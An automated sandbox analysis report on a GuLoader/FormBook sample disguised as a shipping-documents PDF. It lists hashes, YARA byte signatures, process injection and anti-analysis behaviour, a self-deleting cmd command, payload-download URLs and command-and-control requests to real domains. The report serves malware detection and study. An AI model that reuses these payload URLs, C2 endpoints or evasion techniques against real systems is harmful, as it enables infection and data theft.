Loading ...

Play interactive tourEdit tour

Analysis Report Shipping Documents (INV,PL,BL)_pdf.exe

Overview

General Information

Sample Name:Shipping Documents (INV,PL,BL)_pdf.exe
Analysis ID:320999
MD5:aed402d9a5675f5796265e5170ada7cb
SHA1:d2e2087f83c1ef3d10cbe60acb721745d19306b3
SHA256:44350179d4fdd08fd02c02b733f80c82d54f5af31c8a2432de9cfb6b11ab4aa0
Tags:DHLexeGuLoader

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Executable has a suspicious name (potential lure to open the executable)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Shipping Documents (INV,PL,BL)_pdf.exe (PID: 2540 cmdline: 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' MD5: AED402D9A5675F5796265E5170ADA7CB)
    • Shipping Documents (INV,PL,BL)_pdf.exe (PID: 5268 cmdline: 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' MD5: AED402D9A5675F5796265E5170ADA7CB)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 5896 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 6040 cmdline: /c del 'C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x5368:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b307:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c30a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183e9:$sqlite3step: 68 34 1C 7B E1
    • 0x184fc:$sqlite3step: 68 34 1C 7B E1
    • 0x18418:$sqlite3text: 68 38 2A 90 C5
    • 0x1853d:$sqlite3text: 68 38 2A 90 C5
    • 0x1842b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18553:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 16 entries

      Sigma Overview

      No Sigma rule has matched

      Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Antivirus detection for URL or domainShow sources
      Source: https://lifeandhealth.com.mx/)Avira URL Cloud: Label: malware
      Source: https://lifeandhealth.com.mx/xAvira URL Cloud: Label: malware
      Source: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bindAvira URL Cloud: Label: malware
      Source: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin_Avira URL Cloud: Label: malware
      Multi AV Scanner detection for submitted fileShow sources
      Source: Shipping Documents (INV,PL,BL)_pdf.exeVirustotal: Detection: 21%Perma Link
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop esi
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop edi
      Source: global trafficHTTP traffic detected: GET /icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr HTTP/1.1Host: www.drinksandfruits.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr HTTP/1.1Host: www.iatlet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: Joe Sandbox ViewASN Name: NETSOURCEUS NETSOURCEUS
      Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: C:\Windows\explorer.exeCode function: 3_2_061F5782 getaddrinfo,setsockopt,recv,
      Source: global trafficHTTP traffic detected: GET /icm9/?jJEpd=vVVBlGd6XjiYufiPZCtpE8ClhRDPSp+6pFrvIQJUgNbClm9AeMVCLXFgut4jwu7Jje2C&wZ9=O2MpVr HTTP/1.1Host: www.drinksandfruits.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /icm9/?jJEpd=tzd6f6hltsiSnXVk4gBb1fk7WFCRZPV169uDhTo4RpQ3iNZth/6Mcmvn9cuuL1csRrj/&wZ9=O2MpVr HTTP/1.1Host: www.iatlet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownDNS traffic detected: queries for: lifeandhealth.com.mx
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 07:55:04 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://cert.i
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://cert.int-x3.letsencrypt.org/0
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://cps.letsencrypt.org0
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://cps.root-x1.letsencrypt.org0
      Source: explorer.exe, 00000003.00000000.297520534.000000000F6D4000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312545052.000000000098B000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.int-x3.letsencrypt.org0/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.84streetchamber.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.84streetchamber.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.84streetchamber.com/icm9/www.verifyinstagram-help.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.84streetchamber.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cannahavedessert.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cannahavedessert.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cannahavedessert.com/icm9/www.kalcio.site
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.cannahavedessert.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drinksandfruits.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drinksandfruits.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drinksandfruits.com/icm9/www.iatlet.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.drinksandfruits.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.faithinfitness.net
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.faithinfitness.net/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.faithinfitness.net/icm9/www.hunexhq.icu
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.faithinfitness.netReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.frontierautoglasswheatfield.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.frontierautoglasswheatfield.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.frontierautoglasswheatfield.com/icm9/M
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.frontierautoglasswheatfield.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gcsisgreen.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gcsisgreen.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gcsisgreen.com/icm9/www.smartbulk.store
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.gcsisgreen.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.hunexhq.icu
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.hunexhq.icu/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.hunexhq.icu/icm9/www.frontierautoglasswheatfield.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.hunexhq.icuReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.iatlet.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.iatlet.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.iatlet.com/icm9/www.leepl.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.iatlet.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.images77.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.images77.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.images77.com/icm9/www.gcsisgreen.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.images77.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kalcio.site
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kalcio.site/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kalcio.site/icm9/www.mademoisellepierre.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.kalcio.siteReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.leepl.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.leepl.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.leepl.com/icm9/www.nationalcanopies.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.leepl.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.machevate.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.machevate.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.machevate.com/icm9/www.84streetchamber.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.machevate.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.mademoisellepierre.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.mademoisellepierre.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.mademoisellepierre.com/icm9/www.images77.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.mademoisellepierre.comReferer:
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.nationalcanopies.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.nationalcanopies.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.nationalcanopies.com/icm9/www.cannahavedessert.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.nationalcanopies.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.smartbulk.store
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.smartbulk.store/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.smartbulk.store/icm9/www.machevate.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.smartbulk.storeReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.verifyinstagram-help.com
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.verifyinstagram-help.com/icm9/
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.verifyinstagram-help.com/icm9/www.faithinfitness.net
      Source: explorer.exe, 00000003.00000002.498224754.00000000056A1000.00000004.00000001.sdmpString found in binary or memory: http://www.verifyinstagram-help.comReferer:
      Source: explorer.exe, 00000003.00000000.293470278.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/)
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312216879.0000000000563000.00000040.00000001.sdmp, Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bin_
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/graceofgod/Kalied_fAAOrhVS181.bind
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000001.00000002.312502212.0000000000948000.00000004.00000020.sdmpString found in binary or memory: https://lifeandhealth.com.mx/x
      Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
      Source: Shipping Documents (INV,PL,BL)_pdf.exe, 00000000.00000002.241695926.00000000006BA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000B.00000002.485764868.00000000031ED000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.312145897.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.483723038.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.486000436.0000000003310000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.316144266.000000001E150000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.487639953.0000000003A0F000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.485873650.00000000032E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Executable has a suspicious name (potential lure to open the executable)Show sources
      Source: Shipping Documents (INV,PL,BL)_pdf.exeStatic file information: Suspicious name
      Initial sample is a PE file and has a suspicious nameShow sources
      Source: initial sampleStatic PE information: Filename: Shipping Documents (INV,PL,BL)_pdf.exe
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F7FAA NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F97D3 NtResumeThread,
      Source: C:\Users\user\Desktop\Shipping Documents (INV,PL,BL)_pdf.exeCode function: 0_2_020F086A EnumWindows,NtSetInformationThread,
